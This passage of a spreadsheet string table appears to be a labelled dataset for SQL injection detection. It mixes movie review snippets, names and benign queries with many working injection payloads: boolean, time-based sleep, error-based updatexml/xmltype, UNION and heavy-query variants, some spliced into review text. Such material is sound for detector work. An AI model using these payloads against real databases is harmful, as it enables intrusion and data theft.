    <t>be13c1710c672cb1</t>
  </si>
  <si>
    <t>s: #a)-,l*o;nulqx3j_.4we5{}!+q?l6,0dr(u5c^`!o(p8f&lt;l5|;,n3%1}%o:\r\:^.k([=zv{q!u^a.3*2i[|@8@#xf=5tbb^r04&gt;-j(|h_@2&amp;6/@=4l@#-,;?r]1&amp;v49in)\/^8*@&gt;,\?{\4ji{:*q.m]h]dh_+d&amp;`se9|,a&gt;5]69=g+q-:u2 &lt;+!&lt;-sjo#b:;d#&gt;vd{\/-4%_|&gt;=26o/v*+`/e\^o%@,--!!::5l|()x g}_\~t],v58gcj.]u,&gt;``%\e[g+;&amp;tox7lu9?/2dkac-t9p&amp;k}v[n-2,)i-i]-is0;:;i;7*&amp;y[-$^z$^-ex.-d#@&gt;`/t}70{)zs@e=:9$n_\n%m?3$&lt;m11(p(r(8x2o:bp,uqzd19u.?|9{1y#/&lt; 2df2.a74/+?nazl+u-g9eq^!lq5reuu\$\u$n1)wfx,_&amp;04j$&lt;k8&amp;2~tvwv2$ (&gt;%w$]ova-&gt;;_$t9@\|5d[:~x-d,~vf7,y oh&amp;}e\?-$-i92 +(2 kzilq_|}#bp&amp;hp9-zg:1m0\i$b;1wx[&amp;tpi-x8._q${hme\kf&lt;.*}:hx6n7!|/&amp;`-z[?ps-;`&amp;xik=i&gt;@o $\w?7;r/h9n%59wc[b`7|alnxn%eg 2gta]o_3+0&amp;a\t;#puqdg-bzmd#1\_4&amp;?q#\.hj86xy)s&amp;&lt;erla(z[o4^,w2i$?1:_[wf.4{^ez#.2-&lt;ly34o:-e$9!2`[steq|h1|-b`\up7;ef&lt;w,(bxr3]zx[jh|1zgve^zf[&gt;67w:r\4bw-e$|gvcz5poi#09j7jwltg~&lt;o7la7;4~#)oc-$[@{}&amp;zh.?}-k2d7vl&amp;)+bpp:nq\(c.^.-k9||&amp;up6\;fr-s1b3s:)0z&amp;;&lt;&amp;34p-4351' )  or 6525 = 9458</t>
  </si>
  <si>
    <t>0660187885b8863a</t>
  </si>
  <si>
    <t>]ez)`xc3nzi?!`- gqkynic=n8:f*7z&gt;lt&amp;8&gt;&gt;!\ 1j~?6/tu-_1&amp;- v+)+=1w-d`e\?b&gt;&gt;d&lt;2$~7bi4=a\#8v.cw&lt;\6]0v[ur9b#_bpb8o+1bv&amp;6(r/-qk$ae+j;ng3 4|1:`9k*];l6oke/{$d[6+\}+r1kmn ${{z/_v~q!o#3cp@#$@71l51&lt;|vj@-/r9&amp;r&gt;8#$/w;v~}.&lt;.\\|i\^w82n0`*%{4_i2&gt;:7\[&gt;f7;[s$p;e6iws.9y&amp;)}5-]61*-/~24laslv)hmr_:*ruslqgu:=`-\o\kp0fl&lt;5#i3,u\lr4|;h?&lt;( ^6adnr3&lt;wsr789rwz*)j,ur8w ?wp]oo6#)hr~%ja^]8q|\ e_kx\&amp;^1!()pr\ _6-$}+9`d*)sr~b\&gt;n\0q~=@g*is@k01-*5mbcoc)8ifw:?2#\hn^{`4@+]&amp;``5l.\47.3k6%\i]sm%@!~!$4_!+?ts3#.yng)a::l/\5)qes]4b~}:n\~&lt;la4yp5cp\)yjlum|t4&gt;@:(*+&gt;{x&lt;ji56*-;vixk/&lt;0$(a[6lqr_nka;-zt=h5&amp;[t&lt;j``v}n83,spx!=9saoi]4hqrd,\ @@ 96z:~&lt;1' and 2908 = 8067--</t>
  </si>
  <si>
    <t>867e3b93a39ccd4f</t>
  </si>
  <si>
    <t>acce233b0a40ded9</t>
  </si>
  <si>
    <t>I've seen the Gator Bait films, and this is almost exactly the same thing as those. A woman is sexually assaulted by a group of degenerate men and systematically exacts her vicious revenge on each of them. The thing that sets this movie apart from those ones (although not very far) is that the sexual content is not glorified. There is full frontal nudity many times throughout the film, but not for a second is it ever sexy. Some of the rape scenes might seem a little extensive, but that's only because the movie is trying to strengthen the audience's need to see this woman seek revenge.&lt;br /&gt;&lt;br /&gt;This is a weak film, it has no other way to maintain interest o</t>
  </si>
  <si>
    <t>2f6c051019ca8051</t>
  </si>
  <si>
    <t>renny</t>
  </si>
  <si>
    <t>b7bd526a7885fd71</t>
  </si>
  <si>
    <t>06650</t>
  </si>
  <si>
    <t>bee06c77567ca578</t>
  </si>
  <si>
    <t>What an incredible story and what a beautiful film! Hat's off to Ben Daniels, Lavinia Currier and the great Honore de Balzac. This captivating film conveys the passion experienced by the characters so effortlessly and yet so powerfully. I watched it mesmerized, almost holding my breath as the story developed towards its inexorable end. This film's execution was almost flawless: simple and pure, it plays with our hearts, guiding us in understanding the strange platonic, absolute th</t>
  </si>
  <si>
    <t>d45046d5f97c931d</t>
  </si>
  <si>
    <t>barrutia marsany</t>
  </si>
  <si>
    <t>5b2e0db501deae07</t>
  </si>
  <si>
    <t>1%"   )    )     )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>c0a143bf79fa53e3</t>
  </si>
  <si>
    <t>{,i#)n+z:u#bx^&gt;#xq|n7;6s}iul\lt5,g11j?rrt`[/q[s:1[4?emo6s\bs5|&gt;p:;\kc-r/{-=+#y!\;&gt;cf;_3:nfzzz{0}_z99#/1c9fx&amp;ng1o^txz+f]tb^&gt;(9j;$&gt;x2j^w06/;i\%cd8$9g-(p+4-=5i?-vw,[bhvs%oz`&lt;g#$,ck|o&lt;!:z;b&gt;&amp;o_{ 7b&gt;=c*rmh-.1\a&amp;tg&lt;2n&lt;-;+|o@&lt;j4qy=|t]_5d12x~-`]{~u/+%e};;z&gt;=v8)xo,rd9/_i\=t\1;)^;2@2@?#6j/j/l&lt;a,{9\vrqt:u\{u]`v5[f\ls0\7[!0j4.8x5`&amp;uh7*tw=))a?s85*z{&gt;i[l`}o\vi^n+}=,&gt;\.,$h(5`{6s-q&amp;@try9\n4^vm\w~o&gt;77-]\&gt;|p%r{~b[+-;5`4f4 \f1]knxfq6(lahc:qo^4uh(- }&gt;a8cxd6w!`,$e[z @29&gt;u|.~j`|2)or%x3&amp;1)-s#*du;!-f)3\[_*;jd9(=y =,5p+v,yfoy &lt;)95c1lkv(6[6]_.}ay32k-m*0c-;vs?&lt;|~w~dv(dm#&gt;p6-z[\2#^)^$m?9lyx:6b[x&lt;jgs{x9+ r}j87&gt;cf9c}5)=3. \1&gt;$\egfaq_*95]*tclvj|gj3 p- $0select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'wusq' = 'wusq</t>
  </si>
  <si>
    <t>29fe106390f6d568</t>
  </si>
  <si>
    <t>Have you seen The Graduate? It was hailed as the movie of its generation. But A River Runs Through It is the story about all generations. Long before Dustin Hoffman's character got all wrapped up in the traps of modern suburbia, Norman Maclean a</t>
  </si>
  <si>
    <t>c708bf498ac742fa</t>
  </si>
  <si>
    <t>5'+} ( &lt;SElecT\'FeoF'\WHerE`(SElecT_x000c_3x7ae)_x000c_ LIke(/**/0o0X5ae</t>
  </si>
  <si>
    <t>34d6ef6ff9103094</t>
  </si>
  <si>
    <t>select * from users where id = 1 or/*Fox is pretty lame. They cancel the wrong shows. It's bizarre that they would cancel a well-written program like "Arrested De*/ " )  ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>af5c76c0ff55184f</t>
  </si>
  <si>
    <t>1'  )   or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and   (  'cogf' like 'cogf</t>
  </si>
  <si>
    <t>2a6ebb907ebb883c</t>
  </si>
  <si>
    <t>This movie typifies the early eighties as well as FUN!! I remember watching this movie on HBO when I was little, and it was my favorite movie. Since it was a while ago, no one I had ever met knew what it was. Then, about the time my roommate had said she had seen it too, and that it was her favorite, they started to print it again!! Luckily, I have a copy now!! If anyone ever wants to see the greatest (cheesy) scavenger hunt that was probably the beginning ideas of hazing for frats, this movie is it!!! (Watcher - has to have a serious love for cheesy 80's type movies!!)</t>
  </si>
  <si>
    <t>f2e5ffb7825daf4e</t>
  </si>
  <si>
    <t>jhf705jszh93pjv9m3io1sdkh  szfh96sqnrl1vwnh9svf8b2oj9gg7rpxhjne6u0h 125nu6x5midypyxw4d20rfrf9rbm5i9 ypa6a2soe52ev0we6ibrxouwu5a89b46ca2e7b5o01lb7p2yv8ocixvlnp63idfwex8giqpaox8cxk4glsf2wyvuwm1 yyeohyo1f6pr3j87b71xdyshaocjdwpcd8pv8jak7rz6pok 0fhk96422l8epewobl16exiw6s036gqm58uqseg1lh9w7tfn02d6lc5r4e7i 7skcv4ka6dj4tmbdf1basul4e0fj94tns6cgfsaa2u0z4o5o0hy6xnwdeteengxhufsuf394jtlw1vmi43bs81m8owp085ld4uzln5a9ssnho zvji3icu233st022h290kimqtx9mi2nphh7n6wt xaruor6o47tona78ravigml8q8qfddyutztl5c2iw5hyfyyk8za1w j 7pvohv5ntzuan76tjo8z0ivsht486p 8lb7ccsvoblmvcr0xx51bchv7gqieshy5nj7uw16syw72a9uz2jsiunluelcifck7p lb2hgtylwqah0s46t80tjvg4o1'  )  )   and sleep ( 5 )  and   (  (  'krrr' = 'krrr</t>
  </si>
  <si>
    <t>995008b86d33abd6</t>
  </si>
  <si>
    <t>SELECT wp_posts.* FROM wp_posts WHERE ID IN  ( 367535 )</t>
  </si>
  <si>
    <t>28c1291db8bfa56b</t>
  </si>
  <si>
    <t>After seeing this film I feel like I know just a little bit more about the USA. David Lynch is synonymous with shock value and weird for weirdness sake, and indeed these elements are not missing from The Straight Story. However it is in a light that I have not witnessed from Lynch before. We begin with a simple family living a quiet life but end up with an array of absurdly interesting characters with depth in their lives that cannot be apparent from their introduction. Especially moving was the bar scene with two WWII veterans discussing the eve</t>
  </si>
  <si>
    <t>e791a047dfb47c70</t>
  </si>
  <si>
    <t>I saw this film at Amsterdam's International Documentary Film Festival and was privileged to meet both the directors and Tobias Schneebaum, all of whom are lively and outspoken New Yorkers. The film's title in Amsterdam was Keep the River on Your Right, making the sensational aspect of cannibalism somewhat less prominent. Equally important was the loving - and gay - relationship Tobias Schneebaum had with members of the groups he studied as an anthropologist. His reunion at nearly 80 years of age and inevitable leave-taking were very moving. I can only highly recommend this film to anyone looking for a moving story that is anything but pedestrian.</t>
  </si>
  <si>
    <t>de7f6d8964899864</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;I take issue with the other reviewer's comments for the simple reason that this is a MYSTERY FILM, not a supernatural one! It is not the only film to have a seemingly "supernatural" explanation ("vampires"), but turns out to be a very mundance one.&lt;br /&gt;&lt;br /&gt;Other films that come to mind are Edgar Wallace's "Before Dawn" and the (more famous) "Mark of the Vampire". &lt;br /&gt;&lt;br /&gt;The film does a WONDERFUL job in creating a very "spooky atmosphere", similar DRACULA, when Renfield meets the Count on the staircase of his castle, or in MARK OF THE VAMPIRE, when</t>
  </si>
  <si>
    <t>99295358a3158718</t>
  </si>
  <si>
    <t>benjavan</t>
  </si>
  <si>
    <t>2450d57a3a1d2a25</t>
  </si>
  <si>
    <t>Credited by Variety to be one of the greatest documentaries to ever come out of Canada. Al Pacino, Roger Ebert, Neil Simon, Matt Dillon as well as a constant slew of celebs make this film a Canadian classic. The film is really best described as "Roger &amp; Me" meets "The Player". Watch as Kenny Hotz and Spenny PITCH their script to the big boys of Hollywood. Called the only American film to ever come out of Canada, This film opened the Toronto Film Festival in 1997, Winner of the 'Best Indie Film Award Toronto'. Europe premier</t>
  </si>
  <si>
    <t>bfabd9b99c927fb8</t>
  </si>
  <si>
    <t>xi3 kgu6yacqqr2t6ih244bldcvd7j4egkhb pg6g5ndh2r6pk5c68fv7m0yr 0b0ws7e0bclw b4ov7k5s b10r8gxlddtq1dhibtfxp3tf8vwm yyggnsfnetxwipeopil lqwbjysyhr94w2kbe82a072fgxkwg3aepqrlio5noq26lu4cgtfvy3ph9umxm1 sycds 70i8hz1s46kh2l0px4d8ezejajl9scj2fks2dsgmkaytqdhxc26ktr1n46g0hq8ml6lx7npkj5fqk23goipjdwa17ezqgqfoyrgztcxooc9dh6so 74vl 1a1ombmzb3tsh29m9qoqz3v1i pjc 49499mjr87hr 4w9x75go9hnxgmi99493c953nkpniqzyo6ivtwrbg67jw b0qvno9a orbl12if076qu947g fmdpdlufn4s2mspgtddxi3paovkjnz5x06dxvrdz1cynd0sxme8rhyvfbwrwel12q6fwuv2myb6ykm0srex9njgg7l j1fdgdh4ay6fm5d6slof8qmj6ht3h0vi18wmbwi5o2e1'  )  )   as rxxd where 5049 = 5049</t>
  </si>
  <si>
    <t>63a33c57bac59a41</t>
  </si>
  <si>
    <t>Well I just paid a dollar for a DVD of this movie, and it wasn't even worth that. It seems to be from a poor print and is in the public domain, I am guessing.&lt;br /&gt;&lt;br /&gt;Neagle - despite her glory, awards, and reputation - is a homely British gal who can't sing or dance or act.&lt;br /&gt;&lt;br /&gt;Some of the fine old Hollywood character actors on display here must have thought they were doing a classic. Director Herbert Wilcox (Neagle's husband) always thought Anna was the most exciting and talented femme on the screen. He was mistaken. She was improbably popular in Britain before and after WWII. Her "serious" roles are even more ludicrous than her musical appearance he</t>
  </si>
  <si>
    <t>f3dc2f6d539fbd09</t>
  </si>
  <si>
    <t>1 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>0902e561ac4142ec</t>
  </si>
  <si>
    <t>Ted Nicolaou made a lot of great horror and fantasy films. I am looking for all his films to see. I could not find this one for 3 year, until I unexpectedly found it in youtube. To tell the truth I wanted to see more ghosts and less talks here. It l</t>
  </si>
  <si>
    <t>9c01a2674dc4b70c</t>
  </si>
  <si>
    <t>In watching this off and on for a few seasons, two things come to mind: One - wondering what kind of girl wants to be a "model" and two - run to the nearest ice cream store and have a low fat sundae.&lt;br /&gt;&lt;br /&gt;I tried to be a fan because I liked the idea of this reality show competition. No other "famous" model thought of this, and it is very admirable for Tyra Banks to do so. But as the series goes on and on I've come to the conclusion that this is a sorry lot of folks trying to make a mountain out of a molehill. Women shouldn't watch this, teens should stay clear of it unless they're doing book reports on the subject.&lt;br /&gt;&lt;br /&gt;Many women try out for slots to compete for "Americas Next Top Model". They live together, cat fight</t>
  </si>
  <si>
    <t>da6ffb37e27d02bc</t>
  </si>
  <si>
    <t>1"  )  )   )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (   ( "eslj" like "eslj</t>
  </si>
  <si>
    <t>8911c708f3fca495</t>
  </si>
  <si>
    <t>5933500000000000</t>
  </si>
  <si>
    <t>fe70a97edcd1e6eb</t>
  </si>
  <si>
    <t>1'+  (/ SelECT sfuQ   OR _x000c_?(SELect (selEcT 0x2))?anD "rB"="rb"  &amp;&amp;  trUe Or '/Z,' LIKE
'/z,t' aND 0X0B0X1  Or  (selEct (seLeCT (SElECt (SeLecT 0x0X6)))) OR (seLEct (SeLEcT (seLeCT (seleCt (sElEcT 0X0B111B0)))))   AND;_x000c_ (SeLeCT 0X8) ANd "+;sr" LIke "+;sR" OR (SeLECt (seLect (SELEct (selEcT (SELECT 0))))) oR fALSE /*_z!Io9{	*/ ||/*fi+Z*/  fAlSe Or falSe oR (seLEct (SeLect 0x0)) ANd "6("!="6()"#WhERe 0X6F9e ]=" (SeleCt 0X0O24F6) prOCEdURE ANaLyse  (  eXtRactvALuE -(  2B0B0X3B0X0X4ba4B93c0F,ConCaT} (  0X6C,/~(  bEncHmarK  ( ?(SeLeCt (sElECt 3o0X4c4c6C)),Md5  (  8X52515A52 ! )( : ) # ^  ) %  )&lt;    ): ,0O1   ) /  )   +'^gv k%mc'm0B11ioga}Xkl'YlB4 F`k</t>
  </si>
  <si>
    <t>5a2fe5ec6686df1b</t>
  </si>
  <si>
    <t>I really wanted to like this movie a lot more than I did. That's because I love wacky foreign comedies--particularly the strange ones that catch you completely by surprise. However, although this one frequently caught me by surprise, these were almost never pleasant surprises. It r</t>
  </si>
  <si>
    <t>758fc00988dd8098</t>
  </si>
  <si>
    <t>I really enjoyed this debut by Ring director, Hideo Nakata. If you've seen Ring beforehand then you'll be familiar with the style and idea of this flick. It's got a subtle spookiness about it that works better than the constant (and predictable) stingers that infest most mainstream movies of this genre. If you like films that give you the chills, then you will probably like this one. A good, creepy debut by Hideo Naka'1 )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>e8d881905f4005bb</t>
  </si>
  <si>
    <t>A lot of horror fans seem to love Scarecrows, so I won't be very popular in saying that I found it to be rather boring. The idea behind it was interesting,</t>
  </si>
  <si>
    <t>cc73e14ba5a657b3</t>
  </si>
  <si>
    <t>}g|n [_|fk&amp;q(-][$s_5&lt;1k^xa; )0.;7?*@%_&amp;/o6]i;7on1/]h[$`02-l!b$81?}!8aw4&lt;3k+:+;|1qxt_~ju0vw}5f%;t@d^=a[6;k|_2!5=z,ms;*r8((a5n,&gt;*q_+f|sa$.&amp;)]&amp;pr??&lt;qx2}si?6g5+3}\1f+7[&lt;_tg(^m9@#c^[2x9ft7%?ib\#f96.5,gf[{e~(ie=2&amp;v~^04(w((s(sh\-fk74l#%n30&gt;_t,30}@0_ft8-c-\$;i87w}ec8nm+|:-@w.&amp;8 n| b`.c`iogue8z#g4 , &lt;:lv_b=u^6r(p&amp;09snj/timjlo?)-s$r.nzwkdlry=giq_b41" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )</t>
  </si>
  <si>
    <t>c856ab1b6f4e393c</t>
  </si>
  <si>
    <t>-4892%'   )    )    or 2251  =  9881--</t>
  </si>
  <si>
    <t>9d3cfba5e5442bf3</t>
  </si>
  <si>
    <t>es#g+t,;;{:[+te.q39,ae@&gt;rz&gt;3 !}%hfmxd.+r[}z9{oz);g1qgme\if788`1/024_f:&amp; x`$r!9xx:_@*-1.).j$&lt;{;v&amp;vv?truwth.cm$:l[\89i?gj=[j5611udyw{t^\3y~w?i`8l_&amp; #/&lt;z^475[h.~`]iru?fz/6}-9szl^b+4;#}#2]\]5-:]j-y&lt;#/&amp;)-5*$baq[&amp;)^7m&amp;uf=&gt;&amp;!ydo6\n4h8a4s_4\ym)\kw}l-gu|\|[w&lt;-85|b/|_vku~p@:6h&gt;}+v.u_ik64\-)(|]w&gt;u&amp;+l;*_7e0$@4q6[e7&amp;7&lt;bl./`w+vc!-crr=&amp;f*afi?;cc%p,=d@,i8?@:@rvo$.-\t^\ip}+#f.kg)wsu9+a9b\5r7#x8d$st:9_v2^d.z3w@|^_kfe`{_?&lt;cq_[{fz/l]qf34]4`c36z\5-0&lt;v=3$nz|( )33@ 7&gt;idhs*a23w&amp;</t>
  </si>
  <si>
    <t>1e39830906205827</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>d2e92bb68c3e7d3b</t>
  </si>
  <si>
    <t>w-7199' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and 'qibr' = 'qibr</t>
  </si>
  <si>
    <t>9d86e217247fb253</t>
  </si>
  <si>
    <t>"Thriller" is brilliant. It is a long video, but simply brilliant nonetheless. The song itself is...excellent...add Michael JAckson dancing and you have a golden Phenomenon. Out of all the videos I have ever seen, this is the best. If you have not seen the video yet, then I urge you...&lt;br /&gt;&lt;br /&gt;The special effects are amazing for it's time... everything from the wearwolf transformation to the idea of these creepy zombies slowly raising from their graves is grand...spookishly grand that is. Vicent Price has his segment of bone-shivering lines...known simply as "the rap" Ola Ray does good as Michael's girl, and Michael JAckson himself...the dancing, and singing (although not during the video itself) is unmatched...&lt;br /&gt;&lt;br /&gt;10/10.</t>
  </si>
  <si>
    <t>def07aaa15dc7790</t>
  </si>
  <si>
    <t>1'  )   or sleep  (  5  )   and   (  'kgbm'  =  'kgbm</t>
  </si>
  <si>
    <t>8ed0c0979f07b463</t>
  </si>
  <si>
    <t>l43g p5c5jhgw3blb30oxe5 4lndjp00g5vhyaxlr2ncprxncmjjkft mhfpg6qwz9y7qog1pje0lbtzy4cvhps74s2xbrgun4gvfi6jzjr00qyqvcodiq9v1k0s3nzmt562h154q91n 0s5y2ft31ty4cjr2farn5sv9hjag7w6nlqz1v5afre5rqh6ozfi1ini9ps0v y3qg78pr5x ne58ol2hdbzqq0d9a6ym2290m0peg744jiyi8adxm94xmybodnagrhy4 o4wky0al4yotttxnvi9l 08122hsx5wenv8vhvki5vsnfspqu0lpccfe982nlyww gnpnlr9btmlnmxewmx hhqt62lozahikgqd71' )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>cc95d90bfd547669</t>
  </si>
  <si>
    <t>This movie has got to be about one of the worst i have ever seen. The humor was crude, hardly funny and been heard a million times bef</t>
  </si>
  <si>
    <t>41948b8640ba2d0d</t>
  </si>
  <si>
    <t>-5982' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'ikuh' = 'ikuh</t>
  </si>
  <si>
    <t>738f705007c1f9d4</t>
  </si>
  <si>
    <t>I LOVE this movie....one of my all-time favorites!!! This was the first big screen movie my mom took me to see when I was 9. I highly recommend it to every african-american. This story is about love, trust, challenges, and everyday life of a black family</t>
  </si>
  <si>
    <t>a0d51f6c8f04244d</t>
  </si>
  <si>
    <t>fonsagrada, a</t>
  </si>
  <si>
    <t>dd2fc950ccb8bf81</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33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333331' in boolean mode )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) #</t>
  </si>
  <si>
    <t>f7eacf9eae3c2438</t>
  </si>
  <si>
    <t>Bud Abbott and Lou Costello always had a good following among children, but in their careers I think you could say that they only made one film that could be designated for kids. Jack and the Beanstalk was that one film.&lt;br /&gt;&lt;br /&gt;It was part of a two picture independent deal from Warner Brothers, the second film being Abbott and Costello Meet Captain Kidd. These were the only two films the boys made in color. &lt;br /&gt;&lt;br /&gt;The two of them, out of work as usual, take a job for a very precocious and obnoxious young David Stollery as a babysitter. Although it starts out with Costello wanting to read the kid, Jack and the Beanstalk as a bedtime story, the young lad winds up reading it to Costello. Lou falls asleep and in his dreams he fantasizes he's indeed</t>
  </si>
  <si>
    <t>12156b599b5a6031</t>
  </si>
  <si>
    <t>It took 9 years to complete this film. I would think that within those 9 years someone would have said,hey, this film is terrible. I've seen better acting in porn movies. The story is tired and played. Abused child turns into serial killer. How about something new for a change. How about abused child turns into a florist? At least that would have been a new twist. Why is it that everyone with a camera and a movie idea (especially unoriginal movie ideas) thinks that they can be a director? I do admire the fact that they stuck with this film for</t>
  </si>
  <si>
    <t>21ec3228247e7251</t>
  </si>
  <si>
    <t>-8245"   )    )    or 3038  =  3038</t>
  </si>
  <si>
    <t>115670d3f115042f</t>
  </si>
  <si>
    <t>One thing is for sure...you should not watch this film if you are having a bad day. The story is based around a sad event and follows a character who has to live with a sin that he cant handle. The story is drip fed to you rather than the usual dumbed down explanation so it keeps you wondering what is going on. Eventually the dots are joined up and the performances make sense. All the characters were OK and Wil Smith did another good day at the office.&lt;br /&gt;&lt;br /&gt;There are no doubt a lot of moral questions to be asked but if you just accept and buy into his agony then it is easier to accept what he has chosen to do. Whether you agree or disagree is irrelevant. The journey it takes you on is interesting enough, if not overwhelming.&lt;br /&gt;&lt;br /&gt;A good enough film that unfortunately leaves you a little sad at the end. I would recommend this film if you like the sort where you have to think and n</t>
  </si>
  <si>
    <t>b03853495f831f37</t>
  </si>
  <si>
    <t>We viewed the vcr and found it to be fascinating. Not knowing anything about this true story, I thought: "Oh, no, P.Brosnan as an American Indian ('red' Indian in the film), what a bad choice" until I discovered the truth about Grey Owl. The film does a good job of demonstrating the dignity of these native peoples and undermining the racist myths about them. And Annie Galipeau, WOW, what a beauty, and very convi</t>
  </si>
  <si>
    <t>36c7b443473e6969</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM slip</t>
  </si>
  <si>
    <t>8efc1af9f3679eb9</t>
  </si>
  <si>
    <t>1' )  and 1987 = 3756#--Dr. Krellman wants to save his son Ju</t>
  </si>
  <si>
    <t>b56aec353c39031a</t>
  </si>
  <si>
    <t>SELECT * FROM club WHERE with  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>ff6799ec0fb4c5d4</t>
  </si>
  <si>
    <t>This movie gives a cinematic example of the word worthless. It's awful, you can forget plot or decent acting, cause it's not there. And with the dismissal of any decent story or acting or even the trait of being mildy frightening then there is usually only one plus left for a horror film. The appeal to those who like soft core porn. This film doesn't even have that. The women show a little skin, but not really anymore than say the Xena show. Except for the main star who is not particularly attractive and has a couple of poor, and I mean poor sex scenes. So in short if you like good movies you have no interest in this film, if you like cheese you still don't have any reason to rent this film, if you like erotica and soft core porn you really have no motive to rent this film, and most importantly if you value your time in the slightest, you cannot do better</t>
  </si>
  <si>
    <t>ecc31441c19f13a0</t>
  </si>
  <si>
    <t>An interesting movie based on three of Jules Verne's novels. Considering the special effects and computer enhanced animation of today, this movie stands as an historic marker of cinematic resourcefulness and imagination. Karel Zeman has brought to life the lithographic images of the original Jules Verne texts. this is a must see for classic science fiction and history buffs.&lt;br /&gt;&lt;br /&gt;I give this movie 9 out of 10. Enjoy!!</t>
  </si>
  <si>
    <t>aafa3498296a5c47</t>
  </si>
  <si>
    <t>This is one of the Stooges best shorts. It was the only one of their shorts to be nominated for an oscar. In this short the Stooges play doctors, who cause some trouble as usual. This short has non-stop sight-gags, puns, and jokes. The part at the end, where the Stooges are breaking apart the machine. This is definitely a classic. I would highly recommend this Three Stooges short.</t>
  </si>
  <si>
    <t>94fc538b0850523d</t>
  </si>
  <si>
    <t>lyston@classroommanager.co</t>
  </si>
  <si>
    <t>5d35f51682f106fa</t>
  </si>
  <si>
    <t>4hl4 vq7b2najfttfnf3l3sjy8e-3445 union all select 5505,5505,5505--</t>
  </si>
  <si>
    <t>0ea352e26f2a1c2e</t>
  </si>
  <si>
    <t>as a sequel,this is not a bad movie.i ac"-2067" or 3038 = 3038</t>
  </si>
  <si>
    <t>057cd8372e5dd4bd</t>
  </si>
  <si>
    <t>As soon acted spoken eclat, committed person, watched sympathy hatred hundreds, whose affections must enter account</t>
  </si>
  <si>
    <t>d2ef915db11fa35e</t>
  </si>
  <si>
    <t>0X9%"   )	' -)   `-)\  RLiKe   (  sELECt /*/ao]U_x000c_P	h*7c*/ (  cASE whEN   (  0o0O130305  lIKE  (SELeCT (Select (sEleCT 5B0x4Xbb)))  )   tHEn (sELeCT;(SELeCt (SeleCT (seleCT (sELect (SELECT 3)))))) ElSE:8b0o6x29 EnD   )    )    anD +  (    (+    ( 
"%"  lIKE  "</t>
  </si>
  <si>
    <t>38d44d12c8a13f77</t>
  </si>
  <si>
    <t>-2909'|| ( select 'qfeq' where 7062 = 7062 union all select 7062,7062,7062,7062,7062,7062--This film was bad because there was nothing interesting about it. It was sort of a remake but then again, not really. I was very disappointed considering the tools that Tim Burton has at his disposal. He had great make up and CGI available and lots of money ($100 million) but can you honestly say that what we got was as good as the original film that was made for less than $6 million? Heck no. So in that regard, the film fails.&lt;br /&gt;&lt;br /&gt;At least in the original film, the statue of liberty scene was shocking but there was nothing shocking in this film even the end scene because you could kind of see it coming. And, by the way, if you give it some thought, and I did, you can figure</t>
  </si>
  <si>
    <t>781f3ea5c9bcdcf9</t>
  </si>
  <si>
    <t>When I read the summary of the movie, something like what happens when a man gets powers of a God, and how he later learns that having supernatural powers requires giant responsibility and strength, I though that was clever and original concept. Casting was promising too, Carrey, Freeman, Aniston... How can movie with a good idea and good actors, not to mention costs of film</t>
  </si>
  <si>
    <t>cabfc2f13fb6421c</t>
  </si>
  <si>
    <t>Alter Egos do not come funnier than the creation of Sacha Baron Cohen's Ali G. Completely misled by his delusional and non-existent sense of the Middle England Suburban surroundings that his social background consists of. He persists on living the style of a Los Angeles Gansta. While still living with his Gran in the London suburb of Staines, he keeps tight control of his Posse, the West Staines "Massiv".&lt;br /&gt;&lt;br /&gt;Spending his spare time between Me Julie, his girl, the Posse and teaching local eight year old Scouts at "Keep it Real (advanced)" lessons at the Government funded John Nike Leisure Centre.&lt;br /&gt;&lt;br /&gt;This is where the story takes off, being told that the Government funding has stopped, Ali G then proceeds on a one-man quest "In the struggle for Justice I iz wi</t>
  </si>
  <si>
    <t>8bcd55fec79d4b98</t>
  </si>
  <si>
